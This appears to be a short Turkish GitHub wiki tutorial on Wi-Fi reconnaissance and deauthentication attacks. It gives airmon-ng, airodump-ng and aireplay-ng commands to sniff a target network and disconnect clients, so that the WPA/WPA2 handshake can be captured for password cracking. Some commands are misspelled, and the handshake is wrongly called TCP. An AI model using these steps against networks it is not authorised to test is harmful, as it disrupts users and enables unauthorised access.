Ag hakkinda bilgi toplama (Deauth Saldirisi) - altanmelihh/Kali GitHub Wiki

┌──(maxwell㉿Maxwell)-[~] └─$ iwconfig lo no wireless extensions.

eth0 no wireless extensions.

2 Adet modu bulunmaktadir;

-Monitor -Managed

Monitor:Bagli olmadigimiz aglar hakkinda bilgi toplayabiliriz. Managed:Internete baglanabiliriz.

Ornek olarak:

airmon -ng start wlan0

Belli bir aga ozel bilgi edinmek:

-airpdump -ng -channel -bssid -write <file_name>

-airodump -ng --channel12 --bssid 40:30:20:10 --write test mon0

Deauthentication attack:(Yetkisizlendirme)

Ornegin bazi clientlari ve modeme bagli cihazlarini agdan atmak icin kullanilirlar.

-aireplay -ng -deauth <#packets> -a ex: aireplay-ng --deauth 1000 -a 10:20:30:40 mon0

-aireplay-ng --deauth <#packets> -a -c ex: aireplay -ng --deauth 1000 -a 10:20:30:40 -c 00:AA:11:BB mon 0

Örnek bir deauthentication paketi

Bu saldırıyı yapmamızdaki asıl amaç ağa bağlı olan kullanıcının bağlantısını kopartarak modemle tekrar iletişim haline geçerken yollayacağı handshake paketini yakalamaktır. WPA/WPA2 ile şifrelenmiş bir kablosuz ağın şifresini kırabilmek için de access pointin 4’lü el sıkışma (TCP 4 Way Handshake) dediğimiz paketleri yakalamamız gerekmektedir.

Handshake paketleri istemcinin, access pointe bağlanırken dörtlü el sıkışma olduğu sırada oluşturulduğundan, herhangi bir istemcinin access pointe bağlanması gerekmektedir. Handshake yakalamanın yolu da herhangi bir kullanıcının ağa bağlanmasını beklemek, yada bağlı olan kullanıcıyı deauthentication saldırısı ile ağdan koparıp tekrar ağa bağlanırken, dörtlü el sıkışmanın gerçekleştiği sırada handshake paketlerini yakalayıp kaydetmektir.